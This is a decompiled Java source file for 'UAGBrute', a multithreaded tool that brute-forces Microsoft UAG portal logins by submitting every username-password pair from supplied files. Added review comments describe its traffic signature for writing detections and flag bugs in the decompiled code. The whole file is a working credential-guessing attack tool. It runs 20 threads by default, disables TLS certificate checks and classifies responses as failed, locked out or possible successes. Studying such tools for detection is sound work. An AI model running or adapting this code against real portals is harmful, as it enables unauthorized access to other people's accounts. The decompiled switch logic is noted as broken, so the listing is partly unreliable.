package se.swende.uag;

import gnu.getopt.Getopt;
import gnu.getopt.LongOpt;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.ProtocolException;
import java.net.URL;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Hashtable;
import java.util.LinkedList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/* loaded from: input_file:se/swende/uag/Brute.class */
/**
 * Decompiled (JADX) command-line client that submits username/password guesses to the login
 * form of a Microsoft UAG portal, as described by {@link #usage()}.
 *
 * <p>Traffic characteristics visible in this class, useful when writing detections:
 * <ul>
 *   <li>each {@link #go(List)} call starts with an empty {@code Hashtable} (handed to
 *       {@code HttpUtils.readCookies}, so presumably the cookie jar; confirm against HttpUtils),
 *       follows up to five {@code Location} redirects, then POSTs to {@code Validate.asp}
 *       resolved against the first redirect target, with {@code Referer} set to the login page;</li>
 *   <li>at most two login POSTs are made per {@code go()} call before the caller starts over
 *       with a new table, so attempt counting has to be keyed on account or source address
 *       rather than on a session;</li>
 *   <li>the parameter-discovery probe in {@link #main(String[])} submits the fixed user name
 *       {@code "uagbrute"};</li>
 *   <li>responses are classified by the literals {@code "Authentication failed."} and
 *       {@code "InternalError.asp?error_code=106"}.</li>
 * </ul>
 *
 * <p>{@code LOGIN_PARAMETERS}, {@code LOGIN_PAGE_URL} and {@code DEBUG} are mutable statics; the
 * worker threads started by {@code main} read them, and may assign {@code LOGIN_PAGE_URL},
 * without synchronization.
 */
public class Brute {
    // POST body template; set from -a in main() or from Parser.parse() in go().
    public static String LOGIN_PARAMETERS = null;
    // Login page URL; filled in by go() from the sOrigURL value found in the landing page.
    public static String LOGIN_PAGE_URL = null;
    // Set by -d; only passed on to HttpUtils.readCookies in this class.
    static boolean DEBUG = false;
    // Start URL for go(), taken from the -t option.
    private String baseUrl;
    // Compiler-generated cache for the enum switch in go(); see the accessor at the end of the class.
    private static /* synthetic */ int[] $SWITCH_TABLE$se$swende$uag$Brute$LoginResult;

    /**
     * Result of one fetch: either a redirect target or the response body, depending on which
     * constructor was used. The other field stays {@code null}.
     */
    /* JADX INFO: Access modifiers changed from: package-private */
    /* loaded from: input_file:se/swende/uag/Brute$HTTPResult.class */
    public class HTTPResult {
        // Absolute URL built from the Location header, or null for a content result.
        public URL redirect;
        // Response body as text, or null for a redirect result.
        public String content;

        public HTTPResult(URL url) {
            this.redirect = url;
        }

        public HTTPResult(String str) {
            this.content = str;
        }
    }

    /**
     * Classification returned by {@code doLogin}. {@code OK} is the fallback value there, so it
     * means "no failure marker was seen", not "login confirmed".
     */
    /* JADX INFO: Access modifiers changed from: package-private */
    /* loaded from: input_file:se/swende/uag/Brute$LoginResult.class */
    public enum LoginResult {
        OK,
        NOT_OK,
        ATTEMPTS_EXCEEDED;

        // Decompiler-renamed copy of the synthetic values() method; returns a fresh array copy.
        /* renamed from: values, reason: to resolve conflict with enum method */
        public static LoginResult[] valuesCustom() {
            LoginResult[] valuesCustom = values();
            int length = valuesCustom.length;
            LoginResult[] loginResultArr = new LoginResult[length];
            System.arraycopy(valuesCustom, 0, loginResultArr, 0, length);
            return loginResultArr;
        }
    }

    /**
     * @param str URL that {@link #go(List)} requests first
     */
    public Brute(String str) {
        this.baseUrl = str;
    }

    /** Prints {@code str} to stdout with a {@code " - "} prefix. */
    public static void out(String str) {
        System.out.println(" - " + str);
    }

    /**
     * Reads the stream line by line and returns the lines joined with {@code "\n"}.
     *
     * <p>NOTE(review): the {@code catch} sits inside the loop, so after an {@code IOException}
     * the stack trace is printed and {@code readLine()} is called again; a stream that keeps
     * failing keeps this loop running. The reader uses the platform default charset and is
     * never closed.
     *
     * @param inputStream response body stream
     * @return the text read so far, each line terminated by a newline
     */
    private static String readContent(InputStream inputStream) {
        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
        StringBuilder sb = new StringBuilder();
        while (true) {
            try {
                String readLine = bufferedReader.readLine();
                if (readLine == null) {
                    break;
                }
                sb.append(String.valueOf(readLine) + "\n");
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
        return sb.toString();
    }

    /**
     * Sends one login POST and classifies the response by scanning its body line by line.
     *
     * <p>NOTE(review): {@code OK} is returned whenever neither marker is matched, including
     * after a caught exception. {@code getInputStream()} throws {@code IOException} for HTTP
     * error statuses, so server errors, resets and timeouts are all reported as {@code OK}.
     * The {@code indexOf(...) > 0} tests also skip a marker that starts at column 0 of a line.
     * The response reader is not closed on any path.
     *
     * @param url form target
     * @param hashtable table handed to {@code HttpUtils.getConnection} (presumably cookies to
     *     attach; confirm against HttpUtils)
     * @param str request body, written as-is using the platform default charset
     * @param str2 value for the {@code Referer} request header
     * @return {@code NOT_OK} for a 200 response containing {@code "Authentication failed."},
     *     {@code ATTEMPTS_EXCEEDED} for a 302 response containing
     *     {@code "InternalError.asp?error_code=106"}, otherwise {@code OK}
     */
    private static LoginResult doLogin(URL url, Hashtable<String, String> hashtable, String str, String str2) {
        HttpURLConnection connection = HttpUtils.getConnection(url, hashtable);
        connection.setRequestProperty("Referer", str2);
        try {
            connection.setDoOutput(true);
            connection.setRequestMethod("POST");
            OutputStreamWriter outputStreamWriter = new OutputStreamWriter(connection.getOutputStream());
            outputStreamWriter.write(str);
            outputStreamWriter.close();
            BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(connection.getInputStream()));
            while (true) {
                String readLine = bufferedReader.readLine();
                if (readLine == null) {
                    break;
                }
                if (connection.getResponseCode() == 200 && readLine.indexOf("Authentication failed.") > 0) {
                    return LoginResult.NOT_OK;
                }
                // Only reachable with status 302 if HttpUtils.getConnection disabled automatic
                // redirect following; that helper is not shown here.
                if (connection.getResponseCode() == 302 && readLine.indexOf("InternalError.asp?error_code=106") > 0) {
                    return LoginResult.ATTEMPTS_EXCEEDED;
                }
            }
        } catch (ProtocolException e) {
            e.printStackTrace();
        } catch (IOException e2) {
            e2.printStackTrace();
        }
        return LoginResult.OK;
    }

    /**
     * Requests {@code url} and returns either its redirect target or its body.
     *
     * @param url URL to request
     * @param hashtable table passed to {@code HttpUtils.getConnection} and
     *     {@code HttpUtils.readCookies} (presumably updated with response cookies; confirm)
     * @return a redirect result when a {@code Location} header is present (resolved against
     *     {@code url}), a content result otherwise, or {@code null} after any exception
     */
    private HTTPResult fetchUrl(URL url, Hashtable<String, String> hashtable) {
        HttpURLConnection connection = HttpUtils.getConnection(url, hashtable);
        try {
            // Forces the request to be sent; the status value itself is not used.
            connection.getResponseCode();
            HttpUtils.readCookies(connection, DEBUG, hashtable);
            String headerField = connection.getHeaderField("Location");
            if (headerField != null) {
                try {
                    return new HTTPResult(new URL(url, headerField));
                } catch (MalformedURLException e) {
                    e.printStackTrace();
                    return null;
                }
            }
            try {
                return new HTTPResult(readContent(connection.getInputStream()));
            } catch (IOException e2) {
                e2.printStackTrace();
                return null;
            }
        } catch (IOException e3) {
            e3.printStackTrace();
            return null;
        }
    }

    /**
     * Runs one session: walks the redirect chain from {@code baseUrl}, resolves the login page
     * and POST template if they are not known yet, then takes credentials from the head of
     * {@code list} and submits them.
     *
     * <p>NOTE(review): JADX could not reconstruct the switch below (see the warning that
     * follows). As decompiled, no case ends in {@code break}, so every result falls through to
     * the last case. Do not rely on this listing for the per-result behaviour of the original
     * bytecode.
     *
     * @param list credential queue; entries are removed from index 0, so callers sharing the
     *     list across threads must pass a synchronized list (as {@code main} does)
     * @throws IOException if one of the URLs cannot be constructed
     * @throws NoMoreCredentialsException when {@code list} is empty
     */
    /* JADX WARN: Failed to find 'out' block for switch in B:34:0x0146. Please report as an issue. */
    public void go(List<Credential> list) throws IOException, NoMoreCredentialsException {
        URL url = new URL(this.baseUrl);
        Hashtable<String, String> hashtable = new Hashtable<>();
        HTTPResult fetchUrl = fetchUrl(url, hashtable);
        // Redirect budget.
        int i = 5;
        // NOTE(review): fetchUrl() returns null on I/O errors and this line dereferences the
        // result before the null check in the loop condition, so it can throw NullPointerException.
        URL url2 = fetchUrl.redirect;
        while (fetchUrl != null && fetchUrl.redirect != null) {
            int i2 = i;
            i--;
            if (i2 <= 0) {
                break;
            } else {
                fetchUrl = fetchUrl(fetchUrl.redirect, hashtable);
            }
        }
        // i is unchanged only when the first response carried no Location header.
        if (i == 5) {
            System.err.println("Error, the remote server did not redirect us enough! Aborting");
            return;
        }
        // NOTE(review): fetchUrl is null here when a fetch inside the loop failed.
        if (LOGIN_PAGE_URL == null && fetchUrl.content != null) {
            // The login page address is taken from a script assignment of the form sOrigURL = "...".
            Matcher matcher = Pattern.compile("sOrigURL\\s*=\\s*\"([^'\"]+)").matcher(fetchUrl.content);
            if (!matcher.find()) {
                System.err.println("Did not find next location!");
                System.err.println(fetchUrl.content);
                // Terminates the whole JVM, including all other worker threads.
                System.exit(1);
                return;
            }
            out("Next URL: " + matcher.group(1));
            LOGIN_PAGE_URL = matcher.group(1);
        }
        URL url3 = new URL(LOGIN_PAGE_URL);
        HTTPResult fetchUrl2 = fetchUrl(url3, hashtable);
        // Used as the Referer header value for the login POST.
        String url4 = url3.toString();
        // Form target: Validate.asp relative to the first redirect target.
        URL url5 = new URL(url2, "Validate.asp");
        if (LOGIN_PARAMETERS == null) {
            out("Parsing page for login parameters");
            // NOTE(review): fetchUrl2 is null if the login page request failed.
            LOGIN_PARAMETERS = Parser.parse(fetchUrl2.content);
        }
        // z stops the loop; i3 caps the number of attempts made in this call at two.
        boolean z = false;
        int i3 = 2;
        while (!z) {
            int i4 = i3;
            i3--;
            if (i4 <= 0) {
                return;
            }
            try {
                Credential remove = list.remove(0);
                // The case labels are the values stored by the synthetic switch table:
                // 1 = OK, 2 = NOT_OK, 3 = ATTEMPTS_EXCEEDED. The LongOpt constant names were
                // substituted by the decompiler because they have the same int values; they
                // are unrelated to option parsing here.
                switch ($SWITCH_TABLE$se$swende$uag$Brute$LoginResult()[doLogin(url5, hashtable, LOGIN_PARAMETERS.replace("$user_name", remove.getUn()).replace("$password$", remove.getPw()), url4).ordinal()]) {
                    case LongOpt.REQUIRED_ARGUMENT /* 1 */:
                        out(remove + " may be a winner...");
                    case LongOpt.OPTIONAL_ARGUMENT /* 2 */:
                    default:
                        out(remove + " failed");
                    case 3:
                        z = true;
                        out(remove + " failed");
                }
            } catch (IndexOutOfBoundsException e) {
                // remove(0) on an empty list: the queue has been drained.
                throw new NoMoreCredentialsException();
            }
        }
    }

    /** Prints the command-line help text to stdout. */
    public static void usage() {
        System.out.println("Usage: java -jar uagbrute.jar [OPTIONS]\nPerforms brute force guessing of accounts in Microsoft UAG portal.\n\nMandatory options:\n   -p <password_file>   File containing passwords\n   -u <username_file>   File containing usernames\n   -t <target>          The target (e.g https://foobar.com:443/)Non-mandatory options:\n   -s                   If present, 'sameas' will be tested: password the same as username\n   -x                   If present, localhost:8080 will be used as proxy\n   -a                   UAGBrute will attempt to parse the login page to determine the specific                         parameters required, but this may fail. If so, you may be better off specifying                        the parameters yourself through this flag.                         Example: -a user_name=$user_name$&password=$password$&repository=FOOBAR&language=en-US&site_name=foobarportal&secure=1&resource_id=2&login_type=2   -d                   Debug flag   -n <num_threads>     Number of threads to use (default 20)\n");
    }

    /**
     * Returns silently when {@code z} is true; otherwise prints {@code str} to stderr, prints
     * the usage text and exits the JVM with status 1.
     *
     * @param z condition that must hold
     * @param str error message shown when it does not
     */
    public static void validateOrExit(boolean z, String str) {
        if (z) {
            return;
        }
        System.err.println(str);
        usage();
        System.exit(1);
    }

    /**
     * Parses the command line, builds the credential list and starts the worker threads.
     *
     * <p>The option switch at the bottom uses ASCII codes: 63 {@code ?}, 97 {@code a},
     * 100 {@code d}, 110 {@code n}, 112 {@code p}, 115 {@code s}, 116 {@code t},
     * 117 {@code u}, 120 {@code x}. The block guarded by {@code i2 == -1} runs once all
     * options have been consumed.
     *
     * @param strArr command-line arguments
     */
    public static void main(String[] strArr) {
        // i: thread count (-n), z: use proxy (-x), str: password file (-p),
        // str2: username file (-u), str3: target (-t), str4: POST template (-a),
        // z2: also try password equal to username (-s).
        int i = 20;
        boolean z = false;
        String str = null;
        String str2 = null;
        String str3 = null;
        String str4 = null;
        boolean z2 = false;
        Getopt getopt = new Getopt("UAGBrute", strArr, "sdp:u:n:t:a:x?");
        while (true) {
            int i2 = getopt.getopt();
            if (i2 == -1) {
                validateOrExit(str != null, "Error, no password file specified");
                // NOTE(review): str2 is the username file; the message text is copied from the
                // password check above.
                validateOrExit(str2 != null, "Error, no password file specified");
                validateOrExit(str3 != null, "No target specified");
                validateOrExit(str3.startsWith("http"), "Target should start with protocol (http://|https://)");
                if (str4 != null) {
                    validateOrExit(str4.indexOf("$user_name$") > -1, "Error, you need to specify where the username goes, by having $user_name$ in post params");
                    validateOrExit(str4.indexOf("$password$") > -1, "Error, you need to specify where the password goes, by having $password$ in post params");
                }
                LOGIN_PARAMETERS = str4;
                // Raw-typed in the decompiled output; holds Credential objects shared by all workers.
                final List synchronizedList = Collections.synchronizedList(new ArrayList());
                try {
                    String[] readLines = GeneralUtilities.readLines(str2);
                    String[] readLines2 = GeneralUtilities.readLines(str);
                    // Full cross product: every username with every password, held in memory.
                    for (String str5 : readLines) {
                        if (z2) {
                            synchronizedList.add(new Credential(str5, str5));
                        }
                        for (String str6 : readLines2) {
                            synchronizedList.add(new Credential(str5, str6));
                        }
                    }
                    validateOrExit(synchronizedList.size() > 0, "No credentials were read!");
                    if (z) {
                        out("Using proxy");
                        System.setProperty("http.proxyHost", "localhost");
                        System.setProperty("http.proxyPort", "8080");
                        System.setProperty("https.proxyHost", "localhost");
                        System.setProperty("https.proxyPort", "8080");
                    }
                    // Never start more threads than there are credentials.
                    int size = i > synchronizedList.size() ? synchronizedList.size() : i;
                    // NOTE(review): by its name this turns off TLS certificate validation for the
                    // whole process (implementation not shown here); after this call the peer
                    // receiving the submitted credentials is not authenticated.
                    GeneralUtilities.disableCertChecking();
                    final String str7 = str3;
                    if (str4 == null) {
                        out("Checking target to determine post-params and redirections");
                        try {
                            // Probe run with a single fixed credential; go() fills in the
                            // LOGIN_PARAMETERS and LOGIN_PAGE_URL statics as a side effect.
                            LinkedList linkedList = new LinkedList();
                            linkedList.add(new Credential("uagbrute", "hello"));
                            new Brute(str7).go(linkedList);
                        } catch (IOException e) {
                            e.printStackTrace();
                            System.exit(1);
                        } catch (NoMoreCredentialsException e2) {
                            // Expected: the probe list holds one entry, so it can run dry.
                        }
                        out("Post params : " + LOGIN_PARAMETERS);
                        out("Login page URL : " + LOGIN_PAGE_URL);
                    }
                    out(String.format("Starting %d threads for %d credentials against %s", Integer.valueOf(size), Integer.valueOf(synchronizedList.size()), str3));
                    for (int i3 = 0; i3 < size; i3++) {
                        // Each worker keeps creating a new Brute (new session) and calling go()
                        // until the shared list is empty or an IOException is thrown.
                        new Thread(new Runnable() { // from class: se.swende.uag.Brute.1
                            @Override // java.lang.Runnable
                            public void run() {
                                while (true) {
                                    try {
                                        new Brute(str7).go(synchronizedList);
                                    } catch (IOException e3) {
                                        e3.printStackTrace(System.err);
                                        System.err.println("Exiting");
                                        return;
                                    } catch (NoMoreCredentialsException e4) {
                                        return;
                                    }
                                }
                            }
                        }).start();
                    }
                    return;
                } catch (IOException e3) {
                    e3.printStackTrace();
                    return;
                }
            }
            switch (i2) {
                case 63:
                default:
                    usage();
                    System.exit(0);
                    break;
                case 97:
                    str4 = getopt.getOptarg();
                    break;
                case 100:
                    DEBUG = true;
                    break;
                case 110:
                    try {
                        i = Integer.parseInt(getopt.getOptarg());
                        break;
                    } catch (NumberFormatException e4) {
                        System.err.println("Numeric value required for n (num_threads)");
                        // Exits with status 0 even though this is an error path.
                        System.exit(0);
                        break;
                    }
                case 112:
                    str = getopt.getOptarg();
                    break;
                case 115:
                    z2 = true;
                    break;
                case 116:
                    str3 = getopt.getOptarg();
                    break;
                case 117:
                    str2 = getopt.getOptarg();
                    break;
                case 120:
                    z = true;
                    break;
            }
        }
    }

    /**
     * Compiler-generated helper for switching on {@code LoginResult}: lazily builds and caches
     * an array indexed by enum ordinal holding the case label for each constant
     * (OK = 1, NOT_OK = 2, ATTEMPTS_EXCEEDED = 3). The cache field is assigned without
     * synchronization; every thread that initialises it stores the same values.
     *
     * @return the ordinal-to-case-label table
     */
    static /* synthetic */ int[] $SWITCH_TABLE$se$swende$uag$Brute$LoginResult() {
        int[] iArr = $SWITCH_TABLE$se$swende$uag$Brute$LoginResult;
        if (iArr != null) {
            return iArr;
        }
        int[] iArr2 = new int[LoginResult.valuesCustom().length];
        try {
            iArr2[LoginResult.ATTEMPTS_EXCEEDED.ordinal()] = 3;
        } catch (NoSuchFieldError unused) {
        }
        try {
            iArr2[LoginResult.NOT_OK.ordinal()] = 2;
        } catch (NoSuchFieldError unused2) {
        }
        try {
            iArr2[LoginResult.OK.ordinal()] = 1;
        } catch (NoSuchFieldError unused3) {
        }
        $SWITCH_TABLE$se$swende$uag$Brute$LoginResult = iArr2;
        return iArr2;
    }
}
